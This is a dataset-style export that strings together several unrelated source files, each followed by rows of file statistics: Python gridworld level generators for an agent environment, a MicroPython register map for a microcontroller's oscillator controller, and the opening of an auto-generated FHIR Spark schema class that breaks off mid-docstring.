room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
while (room_i, room_j) == (agent_room_i, agent_room_j):
room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
self.place_in_room(room_i, room_j, box)
if i == target_id:
self.box_owner = self.names[box_owner]
self.target_box = box
self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Find the key to the door, find ' + self.names[toy_owner] + ' toy',
danger=True)
room_id = (box.cur_pos[0] // self.room_size) + (box.cur_pos[1] // self.room_size) * self.num_cols
# OpenDoor
colors = COLOR_NAMES[0:3]
n_keys = 2
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
for i in range(n_keys):
obj, _ = add_id_object(self, agent_room_i, agent_room_j, id=i, kind="key", color=colors[i])
if i == locked_door_id:
self.real_key_color = colors[i]
self.target_doors = []
locked_room_i, locked_room_j = room_id // 3, room_id % 3
for door in self.room_grid[locked_room_i][locked_room_j].doors:
if door is not None:
door.is_locked = True
door.id = locked_door_id
self.target_doors.append(door)
class Level_DangerGoToFavObjInBox(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
self.lava_colors = ['yellow', 'blue']
self.n_target = 2
self.goal_pos = (room_size * 2 - 3, room_size - 2)
self.agent_start_pos = (2, 1)
self.call = call
self.names = ['jack', 'mary']
self.anti_danger = anti_danger
self.max_n_rivers = n_rivers
super().__init__(
num_rows=1,
num_cols=2,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
self.add_door(0, 0, door_idx=0, locked=False)
# Place obstacles (lava or walls)
if self.anti_danger:
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self)
self.num_crossings = self.np_random.randint(1, (self.max_n_rivers + 1))
add_danger_tiles_diag(self)
if self.call:
self.grid.set(2, 1, None)
self.agent_pos = (self.room_size - 1, 1)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
self.open_all_doors()
# ObjInBox
self.n_boxes = 2
colors = COLOR_NAMES[:self.n_boxes]
shuffled_colors = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors)
shuffled_colors2 = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors2)
target_id = self._rand_int(0, self.n_boxes)
toy_owner = self._rand_int(0, 2)
box_owner = 1 - toy_owner
for i in range(self.n_boxes):
ball = Ball(color=shuffled_colors[i])
box = Box(color=shuffled_colors2[i], contains=ball)
if i == 0:
place_obj(self, 1, self.room_size - 2, box)
else:
place_obj(self, (self.room_size - 1) * 2 - 1, self.room_size - 2, box)
if i == target_id:
self.box_owner = self.names[box_owner]
self.target_box = box
self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find ' + self.names[toy_owner] + ' toy',
danger=True)
class Level_DangerOpenDoorObjInBox(RoomGridLevel):
def __init__(self, seed=None, room_size=7, call=True, failure_neg=False, anti_danger=True, n_rivers=3):
self.lava_colors = ['yellow', 'blue']
self.names = ['jack', 'mary']
self.n_target = 2
self.agent_start_pos = (2, 1)
self.call = call
self.failure_neg = failure_neg
self.anti_danger = anti_danger
self.max_n_rivers = n_rivers
super().__init__(
num_rows=1,
num_cols=3,
room_size=room_size,
seed=seed,
failure_neg=failure_neg
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
self.room_grid[0][0].door_pos[0] = (6, 1)
self.room_grid[0][1].door_pos[2] = (6, 1)
self.room_grid[0][1].door_pos[0] = (12, 5)
door, _ = self.add_door(1, 0, door_idx=0, locked=False)
door.is_open = True
# Place obstacles (lava or walls)
if self.anti_danger:
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self)
self.num_crossings = self.np_random.randint(1, (self.room_size - 3))
add_danger_tiles_diag(self)
self.num_crossings = self.np_random.randint(1, self.max_n_rivers + 1)
add_danger_tiles_anti_diag(self, offset=12)
self.instrs = GoToGoalInstr(door=True)
if self.call:
self.grid.set(1, self.room_size - 2, None)
self.agent_pos = (1, self.room_size - 2)
else:
self.grid.set(1, 1, None)
self.grid.set(2, 1, None)
self.grid.set(3, 1, None)
self.agent_pos = (1, 1)
self.oracle_pos = (3, 1)
self.grid.set(*self.oracle_pos, Oracle(color='red'))
self.agent_dir = 1
# Open Door Part
colors = COLOR_NAMES[0:3]
n_keys = 2
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
self.locked_door, _ = add_id_door(self, 0, 0, id=locked_door_id, door_idx=0, color=colors[0], locked=True)
self.target_doors = [self.locked_door]
for i in range(n_keys):
obj = KeyWID(i, colors[i])
if i == 0:
self.grid.set(self.room_size - 3, 1, obj)
elif i == 1:
self.grid.set(self.room_size - 2, 2, obj)
if i == locked_door_id:
self.real_key_color = colors[i]
# ObjInBox
self.n_boxes = 2
colors = COLOR_NAMES[:self.n_boxes]
shuffled_colors = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors)
shuffled_colors2 = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors2)
target_id = self._rand_int(0, self.n_boxes)
toy_owner = self._rand_int(0, 2)
box_owner = 1 - toy_owner
for i in range(self.n_boxes):
ball = Ball(color=shuffled_colors[i])
box = BoxOverLap(color=shuffled_colors2[i], contains=ball)
if i == 0:
place_obj(self, (self.room_size - 1) * 3 - 1, 1, box)
else:
place_obj(self, (self.room_size - 1) * 2 - 1, self.room_size - 2, box)
if i == target_id:
self.box_owner = self.names[box_owner]
self.target_box = box
self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find the key to the door, find ' + self.names[toy_owner] + ' toy',
danger=True)
# Boss level
class Level_Boss(RoomGridLevel):
"""
Go to an object, the object may be in another room. Many distractors.
"""
def __init__(
self,
room_size=7,
num_rows=3,
num_cols=3,
num_dists=3,
doors_open=False,
seed=None,
all_doors=True,
num_colors=2,
oracle_mode='call'
):
self.n_target = 2
self.num_dists = num_dists
self.doors_open = doors_open
self.num_rows = num_rows
self.num_cols = num_cols
self.all_doors = all_doors
self.num_colors = num_colors
self.names = ['jack', 'mary']
self.lava_colors = ['yellow', 'blue']
self.others_fav = None
self.oracle_mode = oracle_mode
super().__init__(
num_rows=num_rows,
num_cols=num_cols,
room_size=room_size,
seed=seed
)
def gen_mission(self):
self.target_idx = self.np_random.randint(0, self.n_target)
agent_room_i = self._rand_int(0, self.num_cols)
agent_room_j = self._rand_int(0, self.num_rows)
self.place_agent(agent_room_i, agent_room_j)
locked = False
if self.all_doors:
adjust_door_to_mid(self)
add_id_door(self, 0, 0, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 1, id=100, door_idx=0, locked=locked)
add_id_door(self, 1, 1, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 2, id=100, door_idx=0, locked=locked)
add_id_door(self, 1, 2, id=100, door_idx=0, locked=locked)
add_id_door(self, 0, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 1, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 2, 0, id=100, door_idx=1, locked=locked)
add_id_door(self, 0, 1, id=100, door_idx=1, locked=locked)
add_id_door(self, 1, 1, id=100, door_idx=1, locked=locked)
add_id_door(self, 2, 1, id=100, door_idx=1, locked=locked)
else:
self.connect_all()
add_danger_tiles_circle(self, i_offset=0, j_offset=0)
add_danger_tiles_circle(self, i_offset=6, j_offset=0)
add_danger_tiles_circle(self, i_offset=12, j_offset=0)
add_danger_tiles_circle(self, i_offset=0, j_offset=6)
add_danger_tiles_circle(self, i_offset=6, j_offset=6)
add_danger_tiles_circle(self, i_offset=12, j_offset=6)
add_danger_tiles_circle(self, i_offset=0, j_offset=12)
add_danger_tiles_circle(self, i_offset=6, j_offset=12)
add_danger_tiles_circle(self, i_offset=12, j_offset=12)
if self.doors_open:
self.open_all_doors()
if self.oracle_mode == 'single_move':
oracle = Oracle(color='red')
self.place_in_room(agent_room_i, agent_room_j, oracle)
self.oracle = oracle
# ObjInBox
self.n_boxes = 2
colors = COLOR_NAMES[:self.n_boxes]
shuffled_colors = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors)
shuffled_colors2 = copy.deepcopy(colors)
self.np_random.shuffle(shuffled_colors2)
target_id = self._rand_int(0, self.n_boxes)
toy_owner = self._rand_int(0, 2)
box_owner = 1 - toy_owner
for i in range(self.n_boxes):
ball = Ball(color=shuffled_colors[i])
box = BoxOverLap(color=shuffled_colors2[i], contains=ball)
room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
while (room_i, room_j) == (agent_room_i, agent_room_j):
room_i, room_j = self.np_random.randint(0, self.num_cols), self._rand_int(0, self.num_rows)
self.place_in_room(room_i, room_j, box)
if i == target_id:
self.box_owner = self.names[box_owner]
self.target_box = box
self.instrs = FindOrFailInstr(ObjDesc(ball.type, ball.color), surface='Avoid danger zone, find the key to the door, find ' + self.names[toy_owner] + ' toy',
danger=True)
room_id = (box.cur_pos[0] // self.room_size) + (box.cur_pos[1] // self.room_size) * self.num_cols
# OpenDoor
colors = COLOR_NAMES[0:3]
n_keys = 2
# Add a door of color A connecting left and middle room
locked_door_id = self._rand_int(0, n_keys)
for i in range(n_keys):
obj, _ = add_id_object(self, agent_room_i, agent_room_j, id=i, kind="key", color=colors[i])
if i == locked_door_id:
self.real_key_color = colors[i]
self.target_doors = []
locked_room_i, locked_room_j = room_id // 3, room_id % 3
print(self.room_grid[locked_room_i][locked_room_j].doors)
for door in self.room_grid[locked_room_i][locked_room_j].doors:
if door is not None:
door.is_locked = True
door.id = locked_door_id
self.target_doors.append(door)
# Register the levels in this file
register_levels(__name__, globals())
| 37.702413
| 208
| 0.586095
| 7,955
| 56,252
| 3.868259
| 0.034067
| 0.043936
| 0.027688
| 0.025315
| 0.91216
| 0.903549
| 0.887333
| 0.877779
| 0.866242
| 0.845021
| 0
| 0.027996
| 0.297056
| 56,252
| 1,491
| 209
| 37.7277
| 0.750215
| 0.043554
| 0
| 0.822595
| 0
| 0
| 0.025415
| 0
| 0
| 0
| 0
| 0
| 0.000883
| 1
| 0.047661
| false
| 0
| 0.007944
| 0.001765
| 0.088261
| 0.000883
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2745a03fb3d595654d12960f9c89aa235cac074
| 10,225
|
py
|
Python
|
ATSAMD51P19A/libsrc/ATSAMD51P19A/OSCCTRL_.py
|
t-ikegami/WioTerminal-CircuitPython
|
efbdc2e13ad969fe009d88f7ec4b836ca61ae973
|
[
"MIT"
] | null | null | null |
ATSAMD51P19A/libsrc/ATSAMD51P19A/OSCCTRL_.py
|
t-ikegami/WioTerminal-CircuitPython
|
efbdc2e13ad969fe009d88f7ec4b836ca61ae973
|
[
"MIT"
] | 1
|
2022-01-19T00:16:02.000Z
|
2022-01-26T03:43:34.000Z
|
ATSAMD51P19A/libsrc/ATSAMD51P19A/OSCCTRL_.py
|
t-ikegami/WioTerminal-CircuitPython
|
efbdc2e13ad969fe009d88f7ec4b836ca61ae973
|
[
"MIT"
] | null | null | null |
import uctypes as ct
OSCCTRL_DPLL = {
'DPLLCTRLA' : ( 0x00, {
'reg' : 0x00 | ct.UINT8,
'ENABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'RUNSTDBY' : 0x00 | ct.BFUINT8 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
'ONDEMAND' : 0x00 | ct.BFUINT8 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'DPLLRATIO' : ( 0x04, {
'reg' : 0x00 | ct.UINT32,
'LDR' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 13 << ct.BF_LEN,
'LDRFRAC' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 5 << ct.BF_LEN,
}),
'DPLLCTRLB' : ( 0x08, {
'reg' : 0x00 | ct.UINT32,
'FILTER' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 4 << ct.BF_LEN,
'WUF' : 0x00 | ct.BFUINT32 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
'REFCLK' : 0x00 | ct.BFUINT32 | 5 << ct.BF_POS | 3 << ct.BF_LEN,
'LTIME' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 3 << ct.BF_LEN,
'LBYPASS' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
'DCOFILTER' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 3 << ct.BF_LEN,
'DCOEN' : 0x00 | ct.BFUINT32 | 15 << ct.BF_POS | 1 << ct.BF_LEN,
'DIV' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 11 << ct.BF_LEN,
}),
'DPLLSYNCBUSY' : ( 0x0C, {
'reg' : 0x00 | ct.UINT32,
'ENABLE' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLLRATIO' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'DPLLSTATUS' : ( 0x10, {
'reg' : 0x00 | ct.UINT32,
'LOCK' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
'CLKRDY' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
}),
}
OSCCTRL_ = {
'EVCTRL' : ( 0x00, {
'reg' : 0x00 | ct.UINT8,
'CFDEO0' : 0x00 | ct.BFUINT8 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
'CFDEO1' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'INTENCLR' : ( 0x04, {
'reg' : 0x00 | ct.UINT32,
'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LTO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LTO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'INTENSET' : ( 0x08, {
'reg' : 0x00 | ct.UINT32,
'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LTO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LTO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'INTFLAG' : ( 0x0C, {
'reg' : 0x00 | ct.UINT32,
'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LTO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LTO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'STATUS' : ( 0x10, {
'reg' : 0x00 | ct.UINT32,
'XOSCRDY0' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCRDY1' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL0' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCFAIL1' : 0x00 | ct.BFUINT32 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCCKSW0' : 0x00 | ct.BFUINT32 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
'XOSCCKSW1' : 0x00 | ct.BFUINT32 | 5 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRDY' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLOOB' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKF' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLLCKC' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLRCS' : 0x00 | ct.BFUINT32 | 12 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKR' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LCKF' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0TO' : 0x00 | ct.BFUINT32 | 18 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL0LDRTO' : 0x00 | ct.BFUINT32 | 19 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKR' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LCKF' : 0x00 | ct.BFUINT32 | 25 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1TO' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 1 << ct.BF_LEN,
'DPLL1LDRTO' : 0x00 | ct.BFUINT32 | 27 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'XOSCCTRL' : ( 0x14 | ct.ARRAY, 2, {
'reg' : 0x00 | ct.UINT32,
'ENABLE' : 0x00 | ct.BFUINT32 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'XTALEN' : 0x00 | ct.BFUINT32 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
'RUNSTDBY' : 0x00 | ct.BFUINT32 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
'ONDEMAND' : 0x00 | ct.BFUINT32 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
'LOWBUFGAIN' : 0x00 | ct.BFUINT32 | 8 << ct.BF_POS | 1 << ct.BF_LEN,
'IPTAT' : 0x00 | ct.BFUINT32 | 9 << ct.BF_POS | 2 << ct.BF_LEN,
'IMULT' : 0x00 | ct.BFUINT32 | 11 << ct.BF_POS | 4 << ct.BF_LEN,
'ENALC' : 0x00 | ct.BFUINT32 | 15 << ct.BF_POS | 1 << ct.BF_LEN,
'CFDEN' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 1 << ct.BF_LEN,
'SWBEN' : 0x00 | ct.BFUINT32 | 17 << ct.BF_POS | 1 << ct.BF_LEN,
'STARTUP' : 0x00 | ct.BFUINT32 | 20 << ct.BF_POS | 4 << ct.BF_LEN,
'CFDPRESC' : 0x00 | ct.BFUINT32 | 24 << ct.BF_POS | 4 << ct.BF_LEN,
}),
'DFLLCTRLA' : ( 0x1C, {
'reg' : 0x00 | ct.UINT8,
'ENABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'RUNSTDBY' : 0x00 | ct.BFUINT8 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
'ONDEMAND' : 0x00 | ct.BFUINT8 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'DFLLCTRLB' : ( 0x20, {
'reg' : 0x00 | ct.UINT8,
'MODE' : 0x00 | ct.BFUINT8 | 0 << ct.BF_POS | 1 << ct.BF_LEN,
'STABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'LLAW' : 0x00 | ct.BFUINT8 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
'USBCRM' : 0x00 | ct.BFUINT8 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
'CCDIS' : 0x00 | ct.BFUINT8 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
'QLDIS' : 0x00 | ct.BFUINT8 | 5 << ct.BF_POS | 1 << ct.BF_LEN,
'BPLCKC' : 0x00 | ct.BFUINT8 | 6 << ct.BF_POS | 1 << ct.BF_LEN,
'WAITLOCK' : 0x00 | ct.BFUINT8 | 7 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'DFLLVAL' : ( 0x24, {
'reg' : 0x00 | ct.UINT32,
'FINE' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 8 << ct.BF_LEN,
'COARSE' : 0x00 | ct.BFUINT32 | 10 << ct.BF_POS | 6 << ct.BF_LEN,
'DIFF' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 16 << ct.BF_LEN,
}),
'DFLLMUL' : ( 0x28, {
'reg' : 0x00 | ct.UINT32,
'MUL' : 0x00 | ct.BFUINT32 | 0 << ct.BF_POS | 16 << ct.BF_LEN,
'FSTEP' : 0x00 | ct.BFUINT32 | 16 << ct.BF_POS | 8 << ct.BF_LEN,
'CSTEP' : 0x00 | ct.BFUINT32 | 26 << ct.BF_POS | 6 << ct.BF_LEN,
}),
'DFLLSYNC' : ( 0x2C, {
'reg' : 0x00 | ct.UINT8,
'ENABLE' : 0x00 | ct.BFUINT8 | 1 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLCTRLB' : 0x00 | ct.BFUINT8 | 2 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLVAL' : 0x00 | ct.BFUINT8 | 3 << ct.BF_POS | 1 << ct.BF_LEN,
'DFLLMUL' : 0x00 | ct.BFUINT8 | 4 << ct.BF_POS | 1 << ct.BF_LEN,
}),
'DPLL' : ( 0x30 | ct.ARRAY, 2, OSCCTRL_DPLL ),
}
OSCCTRL = ct.struct(0x40001000, OSCCTRL_)
| 56.491713
| 76
| 0.52665
| 1,582
| 10,225
| 3.247156
| 0.082174
| 0.189994
| 0.166245
| 0.16352
| 0.88359
| 0.864318
| 0.864318
| 0.769321
| 0.753163
| 0.753163
| 0
| 0.147071
| 0.280489
| 10,225
| 180
| 77
| 56.805556
| 0.551176
| 0
| 0
| 0.60452
| 0
| 0
| 0.106112
| 0
| 0
| 0
| 0.061614
| 0
| 0
| 1
| 0
| false
| 0.00565
| 0.00565
| 0
| 0.00565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2825a87118782445d64d690d81136c3aacb969c
| 27,466
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/timing_repeat.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/timing_repeat.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/timing_repeat.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class Timing_RepeatSchema:
"""
Specifies an event that may occur multiple times. Timing schedules are used to
record when things are planned, expected or requested to occur. The most
common usage is in dosage instructions for medications. They are also used
when planning care of various kinds, and may be used for reporting the
schedule to which past regular activities were carried out.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = None,
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
use_date_for: Optional[List[str]] = None,
parent_path: Optional[str] = "",
) -> Union[StructType, DataType]:
"""
Specifies an event that may occur multiple times. Timing schedules are used to
record when things are planned, expected or requested to occur. The most
common usage is in dosage instructions for medications. They are also used
when planning care of various kinds, and may be used for reporting the
schedule to which past regular activities were carried out.
id: Unique id for the element within a resource (for internal references). This
may be any string value that does not contain spaces.
extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
modifierExtension: May be used to represent additional information that is not part of the basic
definition of the element and that modifies the understanding of the element
in which it is contained and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
